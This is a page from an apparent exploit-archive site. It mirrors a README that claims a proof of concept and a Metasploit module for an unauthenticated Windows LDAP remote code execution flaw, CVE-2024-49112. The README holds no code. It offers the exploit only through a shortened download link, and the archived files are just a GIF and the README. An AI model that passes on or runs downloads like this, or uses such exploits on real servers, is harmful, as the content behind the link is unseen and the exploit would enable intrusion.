Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-49112 PoC — Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title:Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2024-49112)
Description:Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
Description
CVE-2024-49112 LDAP RCE PoC and Metasploit Module
Readme
# CVE-2024-49112-PoC
CVE-2024-49112 LDAP RCE PoC and Metasploit Module<br>
[Link to Download: ](https://bit.ly/4gCSPIO)

## Contact Information
You can reach me at: [bollo.b0@proton.me](mailto:bollo.b0@proton.me)

# CVE-2024-49112: Integer Overflow Vulnerability in Windows LDAP Service Leading to Unauthenticated RCE

The **Windows Lightweight Directory Access Protocol (LDAP)** service is vulnerable to an **integer overflow**, which can lead to **unauthenticated remote code execution (RCE)**. This vulnerability allows attackers to execute arbitrary code on a vulnerable system. here, we focus on exploiting the LDAP **server-side** vulnerability (unauthenticate and no user interaction).

## Vulnerability Overview
- **CVE Identifier**: **CVE-2024-49112**
- **Vulnerability Type**: **Integer Overflow**
- **Impact**: **Unauthenticated Remote Code Execution**
- **User Interaction**: **None required**

This vulnerability exists in both the **LDAP server** and the **LDAP client**. However, exploiting these components requires different approaches. here, we will focus on exploitation of the **LDAP server**, which can be targeted directly to achieve RCE without any user interaction.


## Exploit
I will include all my findings and technical details regarding the above mentioned component <br>
with the python script showed below in the video PoC and the custom metasploit module which <br>
I wrote for this to make it easier for post exploitations. <br>
# [Link to Download: ](https://bit.ly/4gCSPIO)

## PoC Video
You can view PoC video here:  
![Watch the PoC](ldap.gif).
File Snapshot

[4.0K] /data/pocs/4bef93ed17cd1938ededf1ca2dcb72a1ff4cb97d ├── [1.2M] ldap.gif └── [1.5K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →